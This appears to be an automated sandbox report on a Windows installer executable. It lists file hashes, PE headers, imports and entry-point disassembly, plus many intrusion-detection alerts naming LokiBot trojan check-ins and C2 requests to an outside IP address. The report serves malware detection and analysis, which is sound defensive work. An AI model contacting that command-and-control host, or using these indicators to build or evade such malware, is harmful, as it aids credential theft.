              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L......c.....................n......w.............@..........................................................................>.......................................=...............................................A...............................text...U........................... ..`.rdata...`.......b..................@..@.data........`.......B..............@....00cfg...............L..............@..@.voltbl..............N..................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\gblqfiy.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:high, very likely benign file
              Preview:1
              Process:C:\Users\user\AppData\Local\Temp\gblqfiy.exe
              File Type:data
              Category:dropped
              Size (bytes):46
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3::
              MD5:D898504A722BFF1524134C6AB6A5EAA5
              SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
              SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
              SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
              Malicious:false
              Reputation:high, very likely benign file
              Preview:..............................................
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):6.964065154966355
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:zlP981oop5.exe
              File size:412163
              MD5:29296ef70f898c80b0dafee4e1ca5998
              SHA1:adc3d1cd691332135cf391371cb1fa8ea2d4d4e7
              SHA256:9b177dcbfca54547e5463b68394e110cf7ae94aadadfb71e574d7dbd400b606b
              SHA512:3dc38b8938572ce716897f050dd48e599e8e713728706eea688b8ff2b32731c798c42d9e6d1fefa9eb397a819268e92479425707f2f5d9c8e69cd7eda44c7f8c
              SSDEEP:12288:aY9aK69OtwMSnLAzYY7i/qrWNjHDEtxXzDgLinrn:aY9ZRwJn2YWi/sWrD43gLinrn
              TLSH:C794027935A0D4A2DC2A0EB119B9C1D14E717C366C69828B3782FBAF7F71590D21B39C
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*.....
              Icon Hash:d8cce4e4e4eee470
              Entrypoint:0x403640
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x614F9B1F [Sat Sep 25 21:56:47 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:61259b55b8912888e90f516ca08dc514
              Instruction
              push ebp
              mov ebp, esp
              sub esp, 000003F4h
              push ebx
              push esi
              push edi
              push 00000020h
              pop edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [ebp-14h], ebx
              mov dword ptr [ebp-04h], 0040A230h
              mov dword ptr [ebp-10h], ebx
              call dword ptr [004080C8h]
              mov esi, dword ptr [004080CCh]
              lea eax, dword ptr [ebp-00000140h]
              push eax
              mov dword ptr [ebp-0000012Ch], ebx
              mov dword ptr [ebp-2Ch], ebx
              mov dword ptr [ebp-28h], ebx
              mov dword ptr [ebp-00000140h], 0000011Ch
              call esi
              test eax, eax
              jne 00007FA394F59AAAh
              lea eax, dword ptr [ebp-00000140h]
              mov dword ptr [ebp-00000140h], 00000114h
              push eax
              call esi
              mov ax, word ptr [ebp-0000012Ch]
              mov ecx, dword ptr [ebp-00000112h]
              sub ax, 00000053h
              add ecx, FFFFFFD0h
              neg ax
              sbb eax, eax
              mov byte ptr [ebp-26h], 00000004h
              not eax
              and eax, ecx
              mov word ptr [ebp-2Ch], ax
              cmp dword ptr [ebp-0000013Ch], 0Ah
              jnc 00007FA394F59A7Ah
              and word ptr [ebp-00000132h], 0000h
              mov eax, dword ptr [ebp-00000134h]
              movzx ecx, byte ptr [ebp-00000138h]
              mov dword ptr [0042A318h], eax
              xor eax, eax
              mov ah, byte ptr [ebp-0000013Ch]
              movzx eax, ax
              or eax, ecx
              xor ecx, ecx
              mov ch, byte ptr [ebp-2Ch]
              movzx ecx, cx
              shl eax, 10h
              or eax, ecx
              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x85040xa0.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3b0000x36cc8.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x66760x6800False0.6568134014423077data6.4174599871908855IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x80000x139a0x1400False0.4498046875data5.141066817170598IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0xa0000x203780x600False0.509765625data4.110582127654237IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .ndata0x2b0000x100000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x3b0000x36cc80x36e00False0.5640527121298405data5.89509487306669IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountry
              RT_ICON0x3b3580x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States
              RT_ICON0x4bb800xe91bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
              RT_ICON0x5a4a00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States
              RT_ICON0x639480x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States
              RT_ICON0x68dd00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States
              RT_ICON0x6cff80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
              RT_ICON0x6f5a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
              RT_ICON0x706480x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
              RT_ICON0x70fd00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
              RT_DIALOG0x714380x100dataEnglishUnited States
              RT_DIALOG0x715380x11cdataEnglishUnited States
              RT_DIALOG0x716580x60dataEnglishUnited States
              RT_GROUP_ICON0x716b80x84dataEnglishUnited States
              RT_VERSION0x717400x244dataEnglishUnited States
              RT_MANIFEST0x719880x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
              DLLImport
              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States
              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
              192.168.2.3171.22.30.14749901802021641 01/05/23-08:53:11.357263TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749708802024318 01/05/23-08:52:10.789251TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749962802021641 01/05/23-08:53:29.855666TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750036802024318 01/05/23-08:53:51.046851TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749708802024313 01/05/23-08:52:10.789251TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749769802024318 01/05/23-08:52:30.825016TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749900802825766 01/05/23-08:53:10.997847TCP2825766ETPRO TROJAN LokiBot Checkin M24990080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498192025483 01/05/23-08:52:46.374891TCP2025483ET TROJAN LokiBot Fake 404 Response8049819171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500282025483 01/05/23-08:53:48.934068TCP2025483ET TROJAN LokiBot Fake 404 Response8050028171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750008802024313 01/05/23-08:53:42.094852TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749933802825766 01/05/23-08:53:20.043516TCP2825766ETPRO TROJAN LokiBot Checkin M24993380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749994802825766 01/05/23-08:53:38.408241TCP2825766ETPRO TROJAN LokiBot Checkin M24999480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749934802021641 01/05/23-08:53:20.304475TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4993480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750003802024318 01/05/23-08:53:40.763519TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750069802024313 01/05/23-08:53:59.913079TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749736802024318 01/05/23-08:52:21.543284TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750064802024318 01/05/23-08:53:58.597698TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750019802025381 01/05/23-08:53:45.311637TCP2025381ET TROJAN LokiBot Checkin5001980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750008802024318 01/05/23-08:53:42.094852TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750064802024313 01/05/23-08:53:58.597698TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499102025483 01/05/23-08:53:13.814649TCP2025483ET TROJAN LokiBot Fake 404 Response8049910171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749797802024313 01/05/23-08:52:40.255110TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749736802024313 01/05/23-08:52:21.543284TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749797802024318 01/05/23-08:52:40.255110TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749810802825766 01/05/23-08:52:43.863274TCP2825766ETPRO TROJAN LokiBot Checkin M24981080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499402025483 01/05/23-08:53:21.975366TCP2025483ET TROJAN LokiBot Fake 404 Response8049940171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749967802021641 01/05/23-08:53:31.230819TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4996780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497942025483 01/05/23-08:52:39.518919TCP2025483ET TROJAN LokiBot Fake 404 Response8049794171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499512025483 01/05/23-08:53:25.015955TCP2025483ET TROJAN LokiBot Fake 404 Response8049951171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750031802024313 01/05/23-08:53:49.661487TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749703802024318 01/05/23-08:52:08.565296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750031802024318 01/05/23-08:53:49.661487TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750036802024313 01/05/23-08:53:51.046851TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749905802825766 01/05/23-08:53:12.409052TCP2825766ETPRO TROJAN LokiBot Checkin M24990580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499922025483 01/05/23-08:53:37.966887TCP2025483ET TROJAN LokiBot Fake 404 Response8049992171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749731802024318 01/05/23-08:52:20.113614TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24973180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749843802825766 01/05/23-08:52:54.266621TCP2825766ETPRO TROJAN LokiBot Checkin M24984380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749731802024313 01/05/23-08:52:20.113614TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14973180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749714802025381 01/05/23-08:52:13.349412TCP2025381ET TROJAN LokiBot Checkin4971480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500172025483 01/05/23-08:53:44.615644TCP2025483ET TROJAN LokiBot Fake 404 Response8050017171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749811802021641 01/05/23-08:52:44.140113TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749815802825766 01/05/23-08:52:45.213789TCP2825766ETPRO TROJAN LokiBot Checkin M24981580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750014802025381 01/05/23-08:53:43.719267TCP2025381ET TROJAN LokiBot Checkin5001480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749931802025381 01/05/23-08:53:19.484274TCP2025381ET TROJAN LokiBot Checkin4993180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749792802024313 01/05/23-08:52:38.887901TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14979280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749792802024318 01/05/23-08:52:38.887901TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24979280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749876802825766 01/05/23-08:53:03.175112TCP2825766ETPRO TROJAN LokiBot Checkin M24987680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749747802025381 01/05/23-08:52:24.577114TCP2025381ET TROJAN LokiBot Checkin4974780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749816802021641 01/05/23-08:52:45.483412TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750075802025381 01/05/23-08:54:01.517358TCP2025381ET TROJAN LokiBot Checkin5007580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497532025483 01/05/23-08:52:26.405615TCP2025483ET TROJAN LokiBot Fake 404 Response8049753171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749719802025381 01/05/23-08:52:15.841614TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749920802024313 01/05/23-08:53:16.511672TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750047802025381 01/05/23-08:53:54.007519TCP2025381ET TROJAN LokiBot Checkin5004780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749742802025381 01/05/23-08:52:23.189713TCP2025381ET TROJAN LokiBot Checkin4974280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749782802021641 01/05/23-08:52:36.098088TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497342025483 01/05/23-08:52:21.057098TCP2025483ET TROJAN LokiBot Fake 404 Response8049734171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497642025483 01/05/23-08:52:29.564114TCP2025483ET TROJAN LokiBot Fake 404 Response8049764171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749903802025381 01/05/23-08:53:11.877542TCP2025381ET TROJAN LokiBot Checkin4990380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749920802024318 01/05/23-08:53:16.511672TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750070802025381 01/05/23-08:54:00.166694TCP2025381ET TROJAN LokiBot Checkin5007080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749871802825766 01/05/23-08:53:01.829225TCP2825766ETPRO TROJAN LokiBot Checkin M24987180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500692025483 01/05/23-08:53:59.993977TCP2025483ET TROJAN LokiBot Fake 404 Response8050069171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749990802021641 01/05/23-08:53:37.383838TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497752025483 01/05/23-08:52:32.764869TCP2025483ET TROJAN LokiBot Fake 404 Response8049775171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749995802021641 01/05/23-08:53:38.676723TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750069802024318 01/05/23-08:53:59.913079TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750016802825766 01/05/23-08:53:44.267939TCP2825766ETPRO TROJAN LokiBot Checkin M25001680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497232025483 01/05/23-08:52:17.901079TCP2025483ET TROJAN LokiBot Fake 404 Response8049723171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497122025483 01/05/23-08:52:12.517516TCP2025483ET TROJAN LokiBot Fake 404 Response8049712171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500582025483 01/05/23-08:53:57.081819TCP2025483ET TROJAN LokiBot Fake 404 Response8050058171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749764802024313 01/05/23-08:52:29.472789TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750042802025381 01/05/23-08:53:52.687057TCP2025381ET TROJAN LokiBot Checkin5004280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497012025483 01/05/23-08:52:07.816134TCP2025483ET TROJAN LokiBot Fake 404 Response8049701171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749769802024313 01/05/23-08:52:30.825016TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14976980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499702025483 01/05/23-08:53:32.118296TCP2025483ET TROJAN LokiBot Fake 404 Response8049970171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380499812025483 01/05/23-08:53:35.036033TCP2025483ET TROJAN LokiBot Fake 404 Response8049981171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500472025483 01/05/23-08:53:54.088522TCP2025483ET TROJAN LokiBot Fake 404 Response8050047171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749764802024318 01/05/23-08:52:29.472789TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24976480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749848802825766 01/05/23-08:52:55.640788TCP2825766ETPRO TROJAN LokiBot Checkin M24984880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749977802024318 01/05/23-08:53:33.899852TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749777802825766 01/05/23-08:52:34.550245TCP2825766ETPRO TROJAN LokiBot Checkin M24977780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500092025483 01/05/23-08:53:42.451776TCP2025483ET TROJAN LokiBot Fake 404 Response8050009171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749717802021641 01/05/23-08:52:14.673219TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749786802825766 01/05/23-08:52:37.217550TCP2825766ETPRO TROJAN LokiBot Checkin M24978680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500062025483 01/05/23-08:53:41.632805TCP2025483ET TROJAN LokiBot Fake 404 Response8050006171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749726802021641 01/05/23-08:52:18.702884TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749916802024318 01/05/23-08:53:15.372296TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749925802024313 01/05/23-08:53:17.874226TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750021802021641 01/05/23-08:53:46.361205TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750044802825766 01/05/23-08:53:53.227481TCP2825766ETPRO TROJAN LokiBot Checkin M25004480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749916802024313 01/05/23-08:53:15.372296TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750053802825766 01/05/23-08:53:55.636070TCP2825766ETPRO TROJAN LokiBot Checkin M25005380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749754802021641 01/05/23-08:52:26.655822TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4975480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749813802025381 01/05/23-08:52:44.686594TCP2025381ET TROJAN LokiBot Checkin4981380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749944802024318 01/05/23-08:53:23.021157TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749745802021641 01/05/23-08:52:24.023320TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4974580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749749802825766 01/05/23-08:52:25.162571TCP2825766ETPRO TROJAN LokiBot Checkin M24974980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750078802021641 01/05/23-08:54:02.320663TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749969802025381 01/05/23-08:53:31.782144TCP2025381ET TROJAN LokiBot Checkin4996980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749804802025381 01/05/23-08:52:42.167879TCP2025381ET TROJAN LokiBot Checkin4980480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498792025483 01/05/23-08:53:04.056744TCP2025483ET TROJAN LokiBot Fake 404 Response8049879171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749802802024313 01/05/23-08:52:41.641382TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498682025483 01/05/23-08:53:01.111667TCP2025483ET TROJAN LokiBot Fake 404 Response8049868171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750072802825766 01/05/23-08:54:00.683642TCP2825766ETPRO TROJAN LokiBot Checkin M25007280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749898802025381 01/05/23-08:53:09.845609TCP2025381ET TROJAN LokiBot Checkin4989880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749944802024313 01/05/23-08:53:23.021157TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750012802021641 01/05/23-08:53:43.190304TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750025802825766 01/05/23-08:53:48.086655TCP2825766ETPRO TROJAN LokiBot Checkin M25002580192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497042025483 01/05/23-08:52:09.015467TCP2025483ET TROJAN LokiBot Fake 404 Response8049704171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749986802024318 01/05/23-08:53:36.285692TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998680192.168.2.3171.22.30.147
